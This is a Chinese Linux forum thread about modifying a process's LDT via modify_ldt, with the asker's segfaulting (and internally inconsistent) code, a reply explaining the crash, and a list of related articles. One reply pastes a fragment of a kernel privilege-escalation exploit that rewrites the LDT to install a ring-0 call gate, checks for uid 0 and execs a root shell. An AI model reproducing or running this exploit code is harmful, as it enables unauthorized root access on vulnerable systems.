请问大家知道怎样修改进程的LDT吗

Linux/Unix社区 > 内核源代码研究区
收藏 回复
[问题点数:80分]
更多帖子
私信 空间 博客
xgwang9
等级
本版专家分:0
结帖率 0%
我最近想为运行的进程设置一个新的段,最简单的办法我想应该是修改LDT。我查到linux有一个系统调用modify_ldt,但是我编写以下代码的时候,出现了错误:



struct user_desc ldts[4]; 

int mx = 0;



int __attribute__ ((constructor)) preload(void)

{

    int ret = 0;

    int i;

    struct user_desc *def_seg = NULL;

    def_seg = (struct user_desc *)malloc(sizeof(struct user_desc));



    def_seg->entry_number = 0x0;

    exec_only_seg->base_addr = 0x0;

    exec_only_seg->limit = 0xffffffff;

    exec_only_seg->seg_32bit = 0x1;

    exec_only_seg->contents = 0x0;

    exec_only_seg->read_exec_only = 0x0;

    exec_only_seg->limit_in_pages = 0x0;

    exec_only_seg->seg_not_present = 0x0;

    exec_only_seg->useable = 0x1;



    ret = modify_ldt(1, (void *)exec_only_seg, sizeof(struct user_desc));

    printf("after write ldt. ret: %d (return 0 success, -1 fail)\n", ret);

    printf("==========================\n");



    ret = modify_ldt(0, (void *)ldts, sizeof(struct user_desc));

    printf("read ldt again. num: %d (0x%x)\n", ret, ret);



    for (i = 0; i < ret/sizeof(struct user_desc); i++) {

       printf("ldt[%d] base: 0x%x. entry num: 0x%x\n", i, ldts[i].base_addr, ldts[i].entry_number);

    }



    asm("pushl %eax");

    asm("movl $0x7, %eax");

    asm("movl %eax, %ds");

    asm("popl %eax");



    mx = 0x1234;



    free(exec_only_seg);



    return 0;

}


错误信息如下:


after write ldt. ret: 0 (return 0 success, -1 fail)

==========================

read ldt again. num: 16 (0x10)

ldt[0] base: 0x4ff200. entry num: 0xffff

Segmentation fault (core dumped)

make: *** [test] Error 139


请问有大神知道是什么情况吗?谢谢啦!
只看楼主 引用 举报 楼主 收起
展开阅读全文
更多帖子
私信 空间 博客
xgwang9
等级
本版专家分:0
或者有人知道Linux上如何操作段的吗?可以在用户态设置一个段,然后把数据放在这个段中 并使用这个段吗?
只看TA 引用 举报 #1得分 0
私信 空间 博客
nswcfd
等级
本版专家分:8397
勋章
Blank
红花 2016年7月 Linux/Unix社区大版内专家分月排行榜第一
2016年3月 Linux/Unix社区大版内专家分月排行榜第一
Blank
黄花 2016年12月 Linux/Unix社区大版内专家分月排行榜第二
那句话出问题了?是汇编指令,还是赋值,还是Free?

用asm把ds修改了,但是free函数不知道ds有变化了,free内部的数据结构还在原来的segment里,
这时却去访问新增加的段,应该有问题的吧?
只看TA 引用 举报 #2得分 0
私信 空间 博客
nswcfd
等级
本版专家分:8397
勋章
Blank
红花 2016年7月 Linux/Unix社区大版内专家分月排行榜第一
2016年3月 Linux/Unix社区大版内专家分月排行榜第一
Blank
黄花 2016年12月 Linux/Unix社区大版内专家分月排行榜第二
PS, read_ldt返回的结构不是user_desc,而是desc_struct
只看TA 引用 举报 #3得分 0
更多帖子
私信 空间 博客
joshua0137
等级
本版专家分:0
一个例子:



 

//	modify LDT & exec

void try_to_exploit(unsigned addr)

{

volatile int r, *v;

 

	printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout);

	unlink(libname);

 

	r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);

	if(r) fatal("mprotect 1", 1);

 

//	check if really LDT

	v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) );

	signal(SIGSEGV, sigfailed);

	r = *v;

	if(r != MAGIC) {

		printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout);

		fatal("find LDT", 1);

	}

 

//	yeah, setup CPL0 gate

	v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU);

	v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;

	printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]); fflush(stdout);

 

//	setup CPL0 segment descriptors (we need the 'accessed' versions ;-)

	v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) );

	v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */

	v[1] = 0x00cf9b00;

 

	v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) );

	v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */

	v[1] = 0x00cf9300;

 

//	reprotect to get only one big VMA

	r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags);

	if(r) fatal("mprotect 2", 1);

 

//	CPL0 transition

	sys_sched_yield();

	val = callme_1() + callme_2();

	asm("lcall $" xstr(SEL_GATE) ",$0x0");

	//if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) {

	if (getuid()==0) {

		printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout);

	} else {

		printf("\n[-] uid change failed" ); fflush(stdout);

		sigfailed(0);

	}

	signal(SIGTERM, SIG_IGN);

	kill(0, SIGTERM);

	setresuid(0, 0, 0);

	execl(shellname, "sh", NULL);

	fatal("execl", 0);

}
只看TA 引用 举报 #4得分 0
收起
收藏 回复
xgwang9

等级:

关注 私信 TA的帖子
进程放到ldt

其实一个进程应该放到一个ldt中 先创建我们的ldt表 //ldt表 struct desc_struct ldt[3]; #define lldt() \ __asm__ ("movw $0x48,%%ax\n\t" \ "lldt %%ax\n\t" \ :::"ax") #define DA_LDT 0x82 下面的工作就是...

哈工大操作系统实验---lab4:基于内核栈的进程切换

综合应用进程、CPU管理、PCB、LDT、内核栈、内核态等知识解决实际问题; 开始建立系统认识。 实验内容: 将Linux0.11中采用的基于TSS进程切换去掉,取而代之的是基于堆栈的切换程序,具体地说,也就是将进程切换函数...

操作系统实验之基于内核栈切换的进程切换

操作系统实验之基于内核栈切换的进程切换

linux进程调度(1)

一、 相关概念简述1.1 Linux进程的四个要素一般来说Linux系统的进程都具备下列诸要素: (1) 有一段程序供其执行。这段程序不一定是某个进程所专有,可以与其他进程共用。 (2) 有进程专用的内核空间堆栈。 (3) 在...

Linux进程描述符——task_struct(初学者的简单学习)

进程是处于执行期的程序以及它所管理的资源(如打开的文件、挂起的信号、进程状态、地址空间等等)的总称。注意,程序并不是进程,实际上两个或多个进程不仅有可能执行同一程序,而且还有可能共享地址空间等资源。 ...

GDT和LDT的关系

GDT(Glocal Descriptor Table)和LDT(Local Descriptor Table)在内存是怎样存放的呢?程序在运行时又是如何对GDT和LDT产生了影响?

linux0.11相关进程数据结构 GDT,LDT,GDTR,LDTR

1 进程结构  union task_union{  struct task_struct task ;  char stack[PAGE_SIZE] ;  }  这实际上是一个内存页,页的底部是进程控制块结构。其余部分是作为

java开发系统内核:使用LDT保护进程数据和代码

使用LDT局部描述符表保护进程代码和数据

进程0的LDT0代码段描述符分析

LDT0的值为 ···· { \ {0,0}, \ /* ldt */ {0x9f,0xc0fa00}, \ {0x9f,0xc0f200}, \ }, ··· 其中第二项{0x9f,0xc0fa00}为代码段的描述符。 然后看task中对ldt的定义: struct task_struct { /* ...

linux分段内存管理中的GDT,LDT,GDTR,LDTR

本文是对上一篇文章《逻辑地址、线性地址、物理地址的关系以及段寄存器在不同位数CPU中的用途演变以及GDT LDT PGD PT的关系》的补充。 一. 寻址方式:实地址模式和保护地址模式 我们知道,内存寻址模式在早期是...

进程1.0——进程的概念与PCB

进程是什么 PCB是什么

GDT,LDT,GDTR,LDTR 详解,包你理解透彻

一、引入 保护模式下的段寄存器 由 16位的选择器 与 64位的段描述符寄存器 构成 段描述符寄存器: 存储段描述符 选择器:存储段描述符的索引 ...PS:原先实模式下的各个段寄存器作为保护模式下的段选择器,80486...

GDT与LDT

GDT的由来: 在Protected Mode下,一个重要的必不可少的数据结构就是GDT(Global Descriptor Table)。 为什么要有GDT?我们首先考虑一下在Real Mode下的编程...

关于GDT与LDT的理解

关于GDT与LDT的理解1、什么是GDT功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建...

操作系统——进程(一):简单的进程

进程控制块(进程表)、进程结构体、进程相关的GDT/LDT进程相关的TSS,以及数据结构的关系 2.掌握构造进程的关键技术: –初始化进程控制块的过程、初始化GDT和TSS、实现进程的启动 3.进程的现场保护与切换,弄...

Linux内核 之 GDT LDT与分段

在整个系统中,全局描述符表GDT只有一张(一个处理器对应一个GDT),GDT可以被放在内存的任何位置,但CPU必须知道GDT的入口,也就是基地址放在哪里,Intel的设计者门提供了一个寄存器GDTR用来存放GDT的入口地址,...

HIT Linux-0.11 实验五 基于内核栈切换的进程切换 实验报告

综合应用进程、CPU 管理、PCB、LDT、内核栈、内核态等知识解决实际问题; 开始建立系统认识。 二、实验内容和结果 0. 进程切换过程   基于内核栈实现进程切换的大致过程如下:   当系统发生中断从用户态进入...

linux下进程进程最大数、最大线程数、进程打开的文件数和ulimit命令修改硬件资源限制

linux系统中ulimit查看和更改系统限制ulimitulimit用于shell启动进程所占用的资源,可以用来设置系统的限制语法格式 ulimit [-acdfHlmnpsStvw] [size] 在/etc/security/limits.conf文件中定义 限制。 命令参数 ...

[转载]LDT descriptor

相对于 LDT(local descriptor table)则是进程独享的。GPRs、selector registers、stack pointers、eflags、LDT descriptor、CR3 构成了一个进程的执行环境。 TSS segment 包含了上述几个环境资源。LDT进程独享...

GDT(全局描述符表)和LDT(局部描述符表)

每个程序都有自己的LDT,但是同一台计算机上的所有程序共享一个GDT。LDT描述局部于每个程序的段,包括其代码、数据、堆栈等。GDT描述系统段,包括操作系统本身。 ①全局描述符表GDT(Global Descriptor Table)在...

局部描述符表LDT的作用+定义+初始化+跳转相关

【0】写在前面0.1)本代码的作用: 旨在说明局部描述符表的作用,及其相关定义,初始化和跳转等内容;0.2)文末的个人总结是干货,前面代码仅供参考的,且source code from orange’s implemention of a os.0.3)...

哈工大-基于内核栈切换的进程切换

本实验是操作系统之进程与线程 - 网易云课堂的配套实验,推荐大家进行实验之前先学习相关课程: L10 用户级线程 L11 内核级线程 L12 核心级线程实现实例 L13 操作系统的那棵树 Tips:点击上方文字中的超链接...

linux0.11进程调度详解

set_ldt_desc() ltr() &amp;amp;amp;amp;amp; lldt() LATCH 进程调度流程 中断处理函数_timer_interrupt do_timer() 文章写的有些长,把相关的、用到的函数都列出来了,看完应该能对进程调度...

GDT、GDTR、LDT、LDTR的学习

GDT的由来: 在Protected Mode下,一个重要的必不可少的数据结构就是GDT(Global Descriptor Table)。 为什么要有GDT?我们首先考虑一下在Real Mode下的编程模型: 在Real Mode下,我们对一个内存地址的访问是...

3. 进程实现及其调度

进程、系统调用和进程调度 进程是操作系统最重要的概念之一,实际上,实现进程之前的部分都不能被称为操作系统。进程的切换和调度等内容是和保护模式的相关技术紧密相连的,而这也是本书作者要花大量篇幅先介绍保护...

GDT、LDT详解

一、引入 保护模式下的段寄存器 由 16位的选择器 与 64位的段描述符寄存器 构成 段描述符寄存器: 存储段描述符 选择器:存储段描述符的索引 ...PS:原先实模式下的各个段寄存器作为保护模式下的段选择器,80486...

linux中进程的用户管理

linux中进程的用户管理 每个进程都拥有真实的用户、组(uid、gid),有效的用户、组(euid、egid),保存的设置用户、组(suid、sgid),还有linux中专门用于文件存储存取的用户、组id(fsuid、fsgid对于unix系统...

进程控制(实验代码、调试分析、实验总结)—— C语言

1、调用fork()来创建两个子进程,并由父进程重复显示字符串"parent:"和 自己的进程号,子进程则重复显示字符串"child: "和自己的进程号。 #include<stdio.h> #include<unistd.h> int main() { pid_t ...

进程进程描述符(task_struct)

一、 进程进程(Process) 计算机中的程序关于某数据集合上的一次运行活动,是系统进行资源分配和调度的基本单位,是操作系统结构的基础。在早期面向进程设计的计算机结构中,进程是程序的基本执行实体;在当代面向...

linux下进程进程最大数 最大线程数 进程打开的文件数和ulimit命令修改硬件资源限制

linux下进程进程最大数 最大线程数 进程打开的文件数和ulimit命令修改硬件资源限制

相关热词 c# 设置窗体为激活 c# 同步发送 c# 多进程 锁 c# 读取类的属性和值 c# out 使用限制 c#获取url的id c# update 集合 c# 公众号 菜单 c#for迭代 c#指针应用